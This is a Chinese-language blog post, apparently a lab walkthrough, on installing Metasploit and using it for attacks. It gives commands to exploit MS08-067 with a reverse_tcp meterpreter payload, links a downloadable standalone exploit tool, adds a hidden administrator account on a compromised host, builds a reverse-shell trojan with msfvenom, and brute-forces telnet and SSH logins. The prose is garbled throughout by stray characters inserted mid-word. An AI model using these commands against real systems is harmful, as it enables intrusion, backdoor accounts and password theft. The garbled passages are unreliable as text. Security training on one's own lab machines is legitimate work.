64.Linux metasploit安裝及使用

滲透測(cè)試框架Metasploit功能眾多,它可以幫助用戶識(shí)別安全問題弊知,驗(yàn)證漏洞的緩解措施握牧,并對(duì)某些軟件進(jìn)行安全性評(píng)估容诬,提供真正的安全風(fēng)險(xiǎn)情報(bào)。
一沿腰、安裝metasploit
在kali系統(tǒng)使用metasploit時(shí)览徒,啟動(dòng)發(fā)生故障,所以將其卸載重裝

apt-get remove metasploit-framework
apt-get install metasploit-framework

重裝失敗颂龙,顯示找不到需要的軟件习蓬,更換source源后重新安裝。

vim /etc/apt/sources.list
  添加這兩行
  deb http://http.kali.org/kali kali-rolling main contrib non-free
  deb-src http://http.kali.org/kali kali-rolling main contrib non-free
apt-get update
apt-get install metasploit-framework

安裝成功措嵌。
啟動(dòng):


成功啟動(dòng)

二躲叼、metasploit利用系統(tǒng)漏洞進(jìn)行攻擊

msfconsole
>show
>use exploit/windows/smb/ms08_067_netapi
>show options
>set RHOST 192.168.252.131    //RHOST是目標(biāo)地址
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST 192.168.252.136
>exploit   //或run,用來執(zhí)行企巢,本例執(zhí)行肯定不成功枫慷,因?yàn)閙s08_067是windows漏洞,我131上裝的是centos浪规。只是用來演示一下過程
image.png

image.png

image.png

image.png

image.png

ps:windows MS08067漏洞介紹
MS08067遠(yuǎn)程溢出漏洞是由于windows系統(tǒng)中RPC存在缺陷造成的或听,windows系統(tǒng)的server服務(wù)在處理特別RPC請(qǐng)求時(shí)存在緩沖區(qū)溢出漏洞,遠(yuǎn)程攻擊者可以通過發(fā)送惡意的RPC請(qǐng)求觸發(fā)這個(gè)溢出笋婿,如果受影響的系統(tǒng)收到了特制偽造的RPC請(qǐng)求誉裆,可能允許遠(yuǎn)程執(zhí)行代碼,導(dǎo)致完全入侵用戶系統(tǒng)萌抵,以SYSTEM權(quán)限執(zhí)行任意指令并獲取數(shù)據(jù)找御,并獲取對(duì)該系統(tǒng)的控制權(quán),造成系統(tǒng)失竊及系統(tǒng)崩潰等嚴(yán)重問題绍填。
1.工具——MS08067.exe 攻擊命令MS08067.exe 192.168.1.3霎桅,向遠(yuǎn)程主機(jī)發(fā)送一串特殊構(gòu)造的數(shù)據(jù)包,使目標(biāo)主機(jī)產(chǎn)生內(nèi)存溢出讨永,程序跳轉(zhuǎn)到shellcode代碼處執(zhí)行滔驶,shellcode代碼在目標(biāo)主機(jī)上開啟4444端口,等待連接卿闹;
工具下載:https://pan.baidu.com/s/1WD6GOT_gTBm6Ahyk45jmRg
提取碼:6cfu
也可以使用像上面一樣使用metasploit進(jìn)行攻擊測(cè)試揭糕。
2.連接遠(yuǎn)程主機(jī)并添加用戶 telnet 192.168.1.3 4444
成功連接目標(biāo)主機(jī),輸入命令ipconfig
添加用戶 net user aaa 123456 /add
把用戶aaa添加到管理員組 net localgroup administrators aaa /add
確認(rèn)aaa是否在管理員組 net user aaa
3.用戶aaa遠(yuǎn)程連接目標(biāo)主機(jī) 開始——運(yùn)行——mstsc 锻霎,輸入ip著角、賬號(hào)、密碼


三旋恼、使用metasploit自己制作木馬吏口,并利用起來
1.根據(jù)自己的ip生成一個(gè)木馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.252.136 lPORT=55555 X >test.ext

2.將制作好的test.exe文件發(fā)送到靶機(jī)上(需要windows xp或03系統(tǒng))
3.使用

use exploit/multi/handler   //使用handle模塊
set PAYLOAD windows/meterpreter/reverse_tcp   //使用這個(gè)shellcode
set LHOST 192.168.252.136
set LPORT 55555
exploit   //打開后,在靶機(jī)上雙擊test.exe,監(jiān)測(cè)

四产徊、使用metasploit掃描弱口令

use auxiliary/scanner/telnet/telnet_login  //使用telnet爆破模塊
set user_file user.txt   //設(shè)置用戶名字典
set pass_file user.txt  //設(shè)置密碼字典
set rhosts IP   //我這里用的是真實(shí)的服務(wù)器地址昂勒,所以馬掉了
run

嘗試爆破telnet弱口令


1543310508(1).jpg

五、使用metasploit爆破ssh弱口令
本機(jī)ip:192.168.252.136
靶機(jī)ip:192.168.252.128
事先編輯好賬號(hào)字典user.txt和密碼字典password.txt
故意在靶機(jī)上設(shè)置弱口令root:ll123456和dazhutizi:123.
嘗試爆破

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_login) > run

爆出root賬號(hào)

但是普通用戶dazhutizi的密碼卻沒有爆出來舟铜,仔細(xì)查看結(jié)果戈盈,發(fā)現(xiàn)原來我之前在128上做了設(shè)置,使遠(yuǎn)程登錄輸錯(cuò)三次密碼后將用戶進(jìn)行鎖定==
image.png

按照我編輯的賬號(hào)和密碼本谆刨,root剛好嘗試了三次就登錄成功了塘娶,而其他普通用戶都被鎖定了==(鎖定方法:http://www.reibang.com/p/8c69cc00bbff
普通用戶被鎖定

將其解鎖,再嘗試成功
參考:http://www.freebuf.com/sectool/67685.html
metasploit使用命令參考:https://www.cnblogs.com/lsgxeva/p/8450277.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末痴荐,一起剝皮案震驚了整個(gè)濱河市血柳,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌生兆,老刑警劉巖难捌,帶你破解...
    沈念sama閱讀 221,198評(píng)論 6 514
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異鸦难,居然都是意外死亡根吁,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,334評(píng)論 3 398
  • 文/潘曉璐 我一進(jìn)店門合蔽,熙熙樓的掌柜王于貴愁眉苦臉地迎上來击敌,“玉大人,你說我怎么就攤上這事拴事∥纸铮” “怎么了?”我有些...
    開封第一講書人閱讀 167,643評(píng)論 0 360
  • 文/不壞的土叔 我叫張陵刃宵,是天一觀的道長(zhǎng)衡瓶。 經(jīng)常有香客問我,道長(zhǎng)牲证,這世上最難降的妖魔是什么哮针? 我笑而不...
    開封第一講書人閱讀 59,495評(píng)論 1 296
  • 正文 為了忘掉前任,我火速辦了婚禮坦袍,結(jié)果婚禮上十厢,老公的妹妹穿的比我還像新娘。我一直安慰自己捂齐,他們只是感情好禽炬,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,502評(píng)論 6 397
  • 文/花漫 我一把揭開白布嚎京。 她就那樣靜靜地躺著胃榕,像睡著了一般。 火紅的嫁衣襯著肌膚如雪近尚。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,156評(píng)論 1 308
  • 那天,我揣著相機(jī)與錄音车酣,去河邊找鬼。 笑死榴都,一個(gè)胖子當(dāng)著我的面吹牛待锈,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播嘴高,決...
    沈念sama閱讀 40,743評(píng)論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼竿音,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了拴驮?” 一聲冷哼從身側(cè)響起春瞬,我...
    開封第一講書人閱讀 39,659評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎套啤,沒想到半個(gè)月后宽气,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,200評(píng)論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡潜沦,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,282評(píng)論 3 340
  • 正文 我和宋清朗相戀三年萄涯,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片唆鸡。...
    茶點(diǎn)故事閱讀 40,424評(píng)論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡涝影,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出争占,到底是詐尸還是另有隱情燃逻,我是刑警寧澤,帶...
    沈念sama閱讀 36,107評(píng)論 5 349
  • 正文 年R本政府宣布臂痕,位于F島的核電站伯襟,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏刻蟹。R本人自食惡果不足惜逗旁,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,789評(píng)論 3 333
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望舆瘪。 院中可真熱鬧片效,春花似錦、人聲如沸英古。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,264評(píng)論 0 23
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽召调。三九已至膨桥,卻和暖如春蛮浑,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背只嚣。 一陣腳步聲響...
    開封第一講書人閱讀 33,390評(píng)論 1 271
  • 我被黑心中介騙來泰國(guó)打工沮稚, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人册舞。 一個(gè)月前我還...
    沈念sama閱讀 48,798評(píng)論 3 376
  • 正文 我出身青樓蕴掏,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親调鲸。 傳聞我的和親對(duì)象是個(gè)殘疾皇子盛杰,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,435評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容

  • 第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 譯者:飛龍 協(xié)議:C...
    布客飛龍閱讀 2,733評(píng)論 0 43
  • 一、MSF終端命令 show exploits 列出metasploit框架中所有的滲透攻擊模塊 show pay...
    Kaen閱讀 3,265評(píng)論 0 1
  • 一 漏洞及漏洞發(fā)掘方法 漏洞藐石,是指在硬件即供、軟件、協(xié)議實(shí)現(xiàn)或系統(tǒng)安全策略上存在缺陷于微,攻擊者能夠在未授權(quán)的情況下對(duì)系統(tǒng)...
    kaitoulee閱讀 15,242評(píng)論 0 30
  • 看書的時(shí)候不要寫廢話 真正了不起的程序員是對(duì)自己程序的每一個(gè)字節(jié)都了如指掌 黑客密集滲透測(cè)試指南第二版學(xué)習(xí)筆記 1...
    NoviceQAQ閱讀 1,486評(píng)論 2 3
  • iOS 數(shù)據(jù)交互模式 主要有兩種:json xml 一逗嫡、Json 什么是JSONJSON是一種輕量級(jí)的數(shù)據(jù)格式,一...
    一個(gè)人的思考閱讀 295評(píng)論 0 0